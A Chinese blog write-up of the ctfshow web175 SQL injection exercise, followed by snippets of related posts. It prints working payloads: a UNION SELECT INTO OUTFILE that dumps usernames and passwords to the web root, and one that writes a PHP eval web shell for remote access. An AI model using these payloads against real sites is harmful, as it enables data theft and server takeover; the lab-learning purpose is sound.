ctfshow web入门sql注入175

于 2025-03-15 01:07:48 发布
阅读量394 收藏 2
点赞数 7
文章标签: sql 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_84499748/article/details/146271888
版权

在这段代码可以看出这个返回逻辑拒绝了所有的ASCII 字符的回显,所以说一般的通过查询来让他回显的方法是不通用的。

在这里我做的时候有点懵,那这个该怎么做呢,也有写脚本的,蛋对于我这种更改学了几个月的新手来说有点太难理解了,然后我看来下其他大佬的wp,我发现我们可以不在这个页面上访问到我们的flag,可以通过我们的查询,吧我们查询到的内容写到一个知道的目录下,然后我就找到了这个。(这个是我借的一个大佬的图,具体在哪的有点忘记了,如果出现对作者不好的影响的话,请佬体谅一下,我知道了会删除)

 然后我们知道了这个路径的话就可以在这里进行相关的文章操作了,在这里我找到了两种方法,首先就是我们的吧flag写到另外一个文件里面去,然后访问这个文件

 代码:union select username, password from ctfshow_user5 into outfile '/var/www/html/flag.txt' %23

然后直接在后面查询flag.txt

然后第二个方法其实也是大同小异,就这次我们不写flag,而是写一段木马上传。

代码:-1' union select 1,"<?php eval($_POST[1]);?>" into outfile'/var/www/html/1.php

随后还是访问这个文件

发现植入成功,然后我们蚁剑来连接

然后连接木马的方式还可以这样使用hackbar的post传参,然后一步一步得到flag

这个就是我这道题的具体的写法,有一些细节的问题还是请各位佬海量。

onlyonly14
关注
ctfshow-web入门-sql注入-web171
HkD01L的博客
11-22 383
此题为 【从0开始学web】系列第一百七十一题 此系列题目从最基础开始,题目遵循循序渐进的原则 从此题开始的150道题全部为sql注入,准备好了吗?
ctfshow-web入门-sql注入-web172
HkD01L的博客
11-22 466
此题为 【从0开始学web】系列第一百七十二题 此系列题目从最基础开始,题目遵循循序渐进的原则 撸猫为主,要什么flag?
CTFshow学习笔记---sql盲注:web175
wecanning的博客
11-02 267
盲注时使用selet into outfile
ctfshow-web入门-sql注入web171-web175
Welcome To Myon'Blog !
07-31 2208
这里只出了一个 id,因为换行导致我们误判为到了最后一个字符,因为我们的字典里只包括数字、小写字母和下划线,因此字符没找到,便跳出外层循环结束了代码。判断一下这次又是三个字段数了,因为还是对输出过滤了 flag,所有我们还是不查用户名,用占位符占位即可。接下来我们先判断下它数据库名的长度,这个其实可以通过 burpsuite 的攻击模块爆破的,没关系,我们这里手写一遍,也锻炼下我们 python 的能力。
适合小白ctfshow-web入门sql注入175-248超详细解析!!
2201_75930505的博客
09-12 818
将数据输出到一个文件中,然后访问对应文件: 这是一个UNION查询,它将原始查询的结果与从表中选择的用户名和密码进行合并。: 这部分似乎是将查询结果导出到文件。路径表示要将查询结果写入到位于网页根目录下的名为1.txt的文件中。(路径是一个常见的用于存放网页文件的目录,通常被称为网页根目录。在许多Web服务器中,这个目录被设置为存放网站的主要文件,因此可以通过浏览器访问。
ctfshow(175->178)--SQL注入--联合注入及其过滤
m0_56019217的博客
10-28 560
在linux中,/var/www/html/是网站默认的文件存放位置,我们将查询内容写入文件之后读取。不再是对查询的内容进行过滤,而是对我们传入的参数进行了过滤。preg_match函数过滤了所有ASCII码中的符号。或者输入1’ or 1=1–+,得到数据表全部数据。依旧联合注入,在注入过程中判断被过滤的字符。,导致我们不能用这两个符号来绕过空格。依旧是过滤了空格,但是也过滤了。但是不知道过滤的内容是什么。发现空格被过滤,将空格替换为。依旧边注入边分析过滤的内容。将数据写入我们创建的文件。
CTFSHOW web入门 sql注入 无过滤注入 web171-175
sinat_41572027的博客
07-07 1919
ctfshow web171-174
ctfshow_web175
qq_38634097的博客
05-28 505
0-127表示单字节字符:数字,英文字符,半角符号,以及某些控制字符。那我们换个思路,不让在页面显示,写在某个文件里,然后查看文件内容。\xnn 匹配ASCII代码中十六进制代码为nn的字符。[x00-x7f] 匹配ASCII值从0-127的字符。打开场景可以看到在本题中,页面的拦截方式做了改变。也就说,是以上字符的不会在页面显示出来。
ctfshow web入门 sql注入175
最新发布
03-23
### CTFShow Web 入门 SQL 注入175题 解法 CTFShow 平台中的 Web 入门级别 SQL 注入题目旨在帮助学习者掌握不同场景下的 SQL 注入技巧。对于第 175 题,其核心在于利用无过滤注入的特点来完成攻击目标。 #### ...
ctfshow web入门 sql注入做题记录
ashMOB的博客
11-12 1170
ctfshow web入门 sql注入 前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-优快云博客_ctfshow sql注入 sql注入的产生: php中对数据库的操作非常简化,只需要一串sql语句的字符串,之后将这个字符串传入mysql_query这个函数就能进行数据库的操作,因而如果对用户传入的参数不进行严格的过滤,或者通过预处理之类的手段严格限制传入的参数,就会造成sql注入漏洞,执行用户自定义的sql语句。 MySQL5注入的一般流程: 获取字
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库中的数据。通过在Web应用程序的输入字段中插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...
ctfshow SQL注入Web175
m0_62584974的博客
05-01 972
查询语句 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 返回逻辑 //检查结果是否有flag if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){ $ret['msg']='查询成功'; } Play...
ctfshow web175-183
akxnxbshai的博客
03-14 6373
Web 175 if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))) 刚开始不知道这句话是什莫意思,还在尝试之前的方法,发现没用。 \xnn 匹配ASCII代码中十六进制代码为nn的字符 [\x00-\x7f] 匹配ASCII值从0-127的字符 所以ASCII值得0-127都被过滤了,select没法用了。 只能盲注了,试一下 1' and sleep(6)--+ 发现确实有延迟,所以可以考虑时间盲注。 时间盲注: 通过时间
ctfshow web入门 sql注入(持续更新)
Lum1n0us's Blog
07-13 1465
文章目录web171web172web173web174web175web176web177web178 web171 第一题嘛,都是最基础的,单引号闭合,用联合查询注入即可。 1' order by 3-- - -1' union select 1,2,3-- - # 库名是ctfshow_web -1' union select 1,database(),3-- - # 表名是ctfshow_user -1' union select 1,group_concat(table_name),3 fro
CTFSHOW-WEB入门SQL注入部分(大概是长期更新)
Npceer-一位网安初学者的博客
02-01 635
SQL注入0x01 web 171 不一定会所有题都放上来(懒) 但是我尽量 0x01 web 171 总算是开始刷sql注入题了 之前学了 但是没写几题 也算个纯萌新了 所以基础题会细一点 也为了加强自己记忆 1,2,3都能回显 继续直接爆表名 1'union select 1,2,table_name from information_schema.tables where table_schema=database() --+ 直接爆字段 记得ctfshow_user要加'' 我试了半天不知道
[CTFSHOW]SQL注入训练
Y4tacker的博客
11-02 1448
文章目录web171web172web173方法一方法二 web171 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user1 -- - web172 普通的sql注入,不做讲解 payload:1' union select id,username,password from ctfshow_user2 -- - web173 方法一 过滤了带有flag的输出,可以转换为16进制输出 1' union se
ctfshow-web入门-sql
qq_43618536的博客
07-10 1090
ctfshow-web入门-sql
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值